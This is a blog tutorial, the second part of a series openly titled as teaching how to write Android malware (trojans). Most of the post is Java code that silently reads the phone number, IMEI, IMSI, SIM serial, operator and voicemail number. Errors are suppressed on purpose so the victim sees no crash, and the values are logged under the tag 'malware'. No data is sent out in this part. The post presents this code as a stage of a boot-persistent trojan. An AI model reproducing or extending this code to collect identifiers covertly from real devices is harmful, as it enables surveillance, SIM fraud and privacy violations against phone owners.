Tutorial: Writing Android malware (trojans) Part 2

 Uncategorized  Add comments
Apr 272013
 

After Part 1 we should have an app that runs on every boot. Thats fine, but it does nothing. Lets assume we want to get some information about the device and current owner for part 2. We will retrieve the phone number from the SIM card, SIM serial, operator, IMSI and IMEI. This is really easy using the Android API. Just have a look at the methods we can use at http://developer.android.com/reference/android/telephony/TelephonyManager.html

Further we will make use of the build-in log. This can also be usefull for debugging your app further. Lets add a new class to the project and call it “PhoneInfo.java”. The first code looks like this:

import android.app.Activity;
import android.content.Context;
import android.telephony.TelephonyManager;

public class PhoneInfo {

  public static String getMyPhoneNumber(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getLine1Number(); 
    }
    catch (Exception e) {
      return "";
    }
  }
}

Note the try catch block! Some devices without a SIM would fail here and we don’t want our application to show a nasty crash window to the user!

As you might have seen in the API description we need another permission, so we add READ_PHONE_STATE to the used permissions in our manifest. Now we modify the MainActivity.java to run this little method and see the output:

@Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    Log.d("malware", "Call me anytime, my number is " + PhoneInfo.getMyPhoneNumber(this));
  }

Note the usage of Log, the first string is the name that will appear in the log, the second the actual text you want to log. Since we wouldn’t log on real world app’s I just called it malware here. If you run the above code on your device you may see something in the lines of this in Eclipse:

2013-04-24 14_36_16-Java - Malware1_src_com_malware_malware1_MainActivity.java - ADT

Now lets make some heavy use of the nice API we got and read some more information. I will post the code on bottom, to make this more readable, but here is what we do in MainActivity:

@Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);

    Log.d("malware", "Number " + PhoneInfo.getMyPhoneNumber(this));
    Log.d("malware", "IMEI " + PhoneInfo.getMyIMEI(this));
    Log.d("malware", "IMSI " + PhoneInfo.getMyIMSI(this));
    Log.d("malware", "Network operator " + PhoneInfo.getMyNetworkOperator(this));
    Log.d("malware", "SIM-Serial " + PhoneInfo.getMySIMSerial(this));
    Log.d("malware", "Voice number " + PhoneInfo.getMyVoiceMailNumberI(this));

and what we get in our Log:

2013-04-24 14_46_27-DDMS - Malware1_src_com_malware_malware1_MainActivity.java - ADT

And this is how the code for PhoneInfo.java looks at the end of part 2:

import android.app.Activity;
import android.content.Context;
import android.telephony.TelephonyManager;

public class PhoneInfo {

  public static String getMyPhoneNumber(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getLine1Number(); 
    }
    catch (Exception e) {
      return "";
    }
  }  
  public static String getMyIMEI(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getDeviceId(); 
    }
    catch (Exception e) {
      return "";
    }
  }  
  public static String getMyNetworkOperator(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getNetworkOperatorName(); 
    }
    catch (Exception e) {
      return "";
    }
  }

  public static String getMySIMSerial(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getSimSerialNumber(); 
    }
    catch (Exception e) {
      return "";
    }
  }
  public static String getMyIMSI(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getSubscriberId(); 
    }
    catch (Exception e) {
      return "";
    }
  }
  public static String getMyVoiceMailNumberI(Activity a){
    try {
      TelephonyManager mTelephonyMgr;
      mTelephonyMgr = (TelephonyManager) a.getSystemService(Context.TELEPHONY_SERVICE);
      return mTelephonyMgr.getVoiceMailNumber(); 
    }
    catch (Exception e) {
      return "";
    }
  }
}

  One Response to “Tutorial: Writing Android malware (trojans) Part 2”

  1. PUNITHA says:
    18/02/2015 at 14:27

    i want coding for malware detecting

    Reply

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)